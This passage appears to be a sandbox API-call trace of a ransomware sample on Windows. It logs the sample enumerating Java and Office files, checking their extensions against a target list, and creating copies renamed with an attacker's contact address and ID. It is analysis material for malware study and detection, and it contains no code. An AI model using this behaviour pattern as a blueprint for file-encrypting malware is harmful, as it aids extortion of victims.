[0158.272] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0158.272] lstrlenW (lpString=".jpg") returned 4 [0158.272] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0158.272] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.272] lstrlenW (lpString="java.dll") returned 8 [0158.272] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.273] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x33bff14 | out: lpFileSize=0x33bff14*=159808) returned 1 [0158.273] CloseHandle (hObject=0x414) returned 1 [0158.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll")) returned 0x20 [0158.273] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.274] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.274] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.274] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.274] lstrlenW (lpString=".doc") returned 4 [0158.274] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.274] lstrlenW (lpString=".docx") returned 5 [0158.274] lstrcmpiW (lpString1=".docx", lpString2="a.dll") returned -1 [0158.274] lstrlenW (lpString=".pdf") returned 4 [0158.274] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.274] lstrlenW (lpString=".xls") returned 4 [0158.274] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.274] lstrlenW (lpString=".xlsx") returned 5 [0158.274] lstrcmpiW (lpString1=".xlsx", lpString2="a.dll") returned -1 [0158.274] lstrlenW (lpString=".ppt") returned 4 [0158.274] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.274] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.274] lstrlenW (lpString=".zip") returned 4 [0158.274] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.274] lstrlenW (lpString=".rar") returned 4 [0158.274] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.274] lstrlenW (lpString=".bz2") returned 4 [0158.274] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.275] lstrlenW (lpString=".7z") returned 3 [0158.275] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.275] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.275] lstrlenW (lpString=".dbf") returned 4 [0158.275] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.275] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.275] lstrlenW (lpString=".1cd") returned 4 [0158.275] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.275] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.275] lstrlenW (lpString=".jpg") returned 4 [0158.275] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.275] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.275] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.275] lstrlenW (lpString=".doc") returned 4 [0158.275] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.275] lstrlenW (lpString=".docx") returned 5 [0158.275] lstrcmpiW (lpString1=".docx", lpString2="a.dll") returned -1 [0158.275] lstrlenW (lpString=".pdf") returned 4 [0158.275] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.275] lstrlenW (lpString=".xls") returned 4 [0158.275] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.275] lstrlenW (lpString=".xlsx") returned 5 [0158.275] lstrcmpiW (lpString1=".xlsx", lpString2="a.dll") returned -1 [0158.275] lstrlenW (lpString=".ppt") returned 4 [0158.275] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.275] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.275] lstrlenW (lpString=".zip") returned 4 [0158.276] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.276] lstrlenW (lpString=".rar") returned 4 [0158.276] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.276] lstrlenW (lpString=".bz2") returned 4 [0158.276] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.276] lstrlenW (lpString=".7z") returned 3 [0158.276] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.276] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.276] lstrlenW (lpString=".dbf") returned 4 [0158.276] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.276] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.276] lstrlenW (lpString=".1cd") returned 4 [0158.276] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.276] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0158.276] lstrlenW (lpString=".jpg") returned 4 [0158.276] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.276] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0158.276] lstrlenW (lpString="java.exe") returned 8 [0158.276] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.277] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x33bff14 | out: lpFileSize=0x33bff14*=206912) returned 1 [0158.277] CloseHandle (hObject=0x414) returned 1 [0158.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe")) returned 0x20 [0158.277] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.277] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.278] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.278] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.278] lstrlenW (lpString=".doc") returned 4 [0158.278] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0158.278] lstrlenW (lpString=".docx") returned 5 [0158.278] lstrcmpiW (lpString1=".docx", lpString2="a.exe") returned -1 [0158.278] lstrlenW (lpString=".pdf") returned 4 [0158.278] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0158.278] lstrlenW (lpString=".xls") returned 4 [0158.278] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0158.278] lstrlenW (lpString=".xlsx") returned 5 [0158.278] lstrcmpiW (lpString1=".xlsx", lpString2="a.exe") returned -1 [0158.278] lstrlenW (lpString=".ppt") returned 4 [0158.278] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0158.278] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.278] lstrlenW (lpString=".zip") returned 4 [0158.278] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0158.278] lstrlenW (lpString=".rar") returned 4 [0158.278] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0158.278] lstrlenW (lpString=".bz2") returned 4 [0158.278] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0158.278] lstrlenW (lpString=".7z") returned 3 [0158.278] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0158.278] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.278] lstrlenW (lpString=".dbf") returned 4 [0158.279] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0158.279] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.279] lstrlenW (lpString=".1cd") returned 4 [0158.279] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0158.279] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.279] lstrlenW (lpString=".jpg") returned 4 [0158.279] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0158.279] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.279] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.279] lstrlenW (lpString=".doc") returned 4 [0158.279] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0158.279] lstrlenW (lpString=".docx") returned 5 [0158.279] lstrcmpiW (lpString1=".docx", lpString2="a.exe") returned -1 [0158.279] lstrlenW (lpString=".pdf") returned 4 [0158.279] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0158.279] lstrlenW (lpString=".xls") returned 4 [0158.279] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0158.279] lstrlenW (lpString=".xlsx") returned 5 [0158.279] lstrcmpiW (lpString1=".xlsx", lpString2="a.exe") returned -1 [0158.279] lstrlenW (lpString=".ppt") returned 4 [0158.279] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0158.279] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.279] lstrlenW (lpString=".zip") returned 4 [0158.279] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0158.279] lstrlenW (lpString=".rar") returned 4 [0158.279] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0158.279] lstrlenW (lpString=".bz2") returned 4 [0158.279] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0158.279] lstrlenW (lpString=".7z") returned 3 [0158.279] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0158.279] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.279] lstrlenW (lpString=".dbf") returned 4 [0158.279] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0158.279] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.280] lstrlenW (lpString=".1cd") returned 4 [0158.280] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0158.280] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0158.280] lstrlenW (lpString=".jpg") returned 4 [0158.280] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0158.280] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.280] lstrlenW (lpString="JavaAccessBridge-64.dll") returned 23 [0158.280] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.280] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x33bff14 | out: lpFileSize=0x33bff14*=142400) returned 1 [0158.280] CloseHandle (hObject=0x414) returned 1 [0158.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll")) returned 0x20 [0158.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.281] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\javaaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.281] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0158.281] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0158.281] lstrlenW (lpString=".doc") returned 4 [0158.281] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.281] lstrlenW (lpString=".docx") returned 5 [0158.281] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0158.281] lstrlenW (lpString=".pdf") returned 4 [0158.281] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.281] lstrlenW (lpString=".xls") returned 4 [0158.281] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.281] lstrlenW (lpString=".xlsx") returned 5 [0158.281] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0158.281] lstrlenW (lpString=".ppt") returned 4 [0158.281] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.281] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0158.281] lstrlenW (lpString=".zip") returned 4 [0158.281] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.281] lstrlenW (lpString=".rar") returned 4 [0158.281] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.281] lstrlenW (lpString=".bz2") returned 4 [0158.281] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.281] lstrlenW (lpString=".7z") returned 3 [0158.281] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.281] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\JavaAccessBridge-64.dll") returned 62 [0159.079] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.080] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.080] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.080] CloseHandle (hObject=0x484) returned 1 [0159.339] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.339] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0159.342] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jce.jar.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jce.jar.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.342] CloseHandle (hObject=0x420) returned 1 [0160.777] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.777] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\MUSIC_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\music_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.778] CloseHandle (hObject=0x42c) returned 1 [0160.779] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.779] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\URBAN_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\urban_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.780] CloseHandle (hObject=0x42c) returned 1 [0160.781] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.781] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\VCTRN_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\vctrn_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.781] CloseHandle (hObject=0x42c) returned 1 [0160.783] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.783] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WNTER_01.MID.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wnter_01.mid.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.783] CloseHandle (hObject=0x42c) returned 1 [0160.786] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.786] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Banded Edge.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\banded edge.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.787] CloseHandle (hObject=0x42c) returned 1 [0160.788] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.788] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.788] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Extreme Shadow.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\extreme shadow.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.788] CloseHandle (hObject=0x42c) returned 1 [0160.789] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.789] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Frosted Glass.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\frosted glass.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.789] CloseHandle (hObject=0x42c) returned 1 [0160.790] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.790] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Glossy.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\glossy.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.790] CloseHandle (hObject=0x42c) returned 1 [0160.792] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.792] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Glow Edge.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\glow edge.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.792] CloseHandle (hObject=0x42c) returned 1 [0160.793] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.793] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Grunge Texture.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\grunge texture.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.793] CloseHandle (hObject=0x42c) returned 1 [0160.793] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.793] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Inset.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\inset.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.794] CloseHandle (hObject=0x42c) returned 1 [0160.798] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.798] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Milk Glass.eftx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\milk glass.eftx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0160.799] CloseHandle (hObject=0x42c) returned 1 [0160.800] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.800] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0160.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 